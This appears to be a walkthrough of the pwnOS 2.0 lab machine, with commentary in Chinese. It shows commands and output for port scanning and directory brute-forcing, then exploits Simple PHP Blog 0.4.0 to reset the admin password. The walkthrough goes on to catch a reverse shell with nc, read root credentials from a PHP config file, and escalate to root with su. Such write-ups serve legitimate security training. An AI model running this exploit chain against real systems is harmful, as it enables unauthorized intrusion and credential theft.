PWNOS2.0 Walkthrough
Reconnaissance
Port Scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -F 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:52 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
Enumeration
HTTP Enumeration
这里发现存在80端口,使用dirb进行目录的爆破
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100 | grep "=="
==> DIRECTORY: http://10.10.10.100/blog/
==> DIRECTORY: http://10.10.10.100/includes/
==> DIRECTORY: http://10.10.10.100/blog/config/
==> DIRECTORY: http://10.10.10.100/blog/content/
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
==> DIRECTORY: http://10.10.10.100/blog/scripts/
==> DIRECTORY: http://10.10.10.100/blog/themes/
访问http://10.10.10.100/blog
进入到了一个blog页面,查看网页源代码,发现该系统名为Simple PHP Blog 0.4.0
1
<meta name="generator" content="Simple PHP Blog 0.4.0" />
使用searchsploit
进行搜索,发现存在Multiple Remote
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ searchsploit simple PHP 0.4
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command Execution | php/webapps/1581.pl
Exploitation
使用1191.pl
对其进行利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin
*** Exploit Completed....
Have a nice day! :)
使用刚刚设置好的账号密码进行登录
成功上传,在攻击机下进行端口监听并执行访问该php文件,成功进行反弹shell
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown host
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 44078
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
20:00:24 up 4:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
Privilege Escalation
在/var
目录下发现存在一个mysqli_connect.php
的文件,对其进行查看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
这里使用刚刚得到的密码,切换到root
用户
1
2
3
4
5
6
7
8
# 此命令利用 Python 的 `pty` 模块中的 `spawn` 函数直接启动了一个正常交互式的 Bash shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@web:/var$ su root
su root
Password: root@ISIntS
root@web:/var# id
id
uid=0(root) gid=0(root) groups=0(root)
#
This post is licensed under
CC BY 4.0
by the author.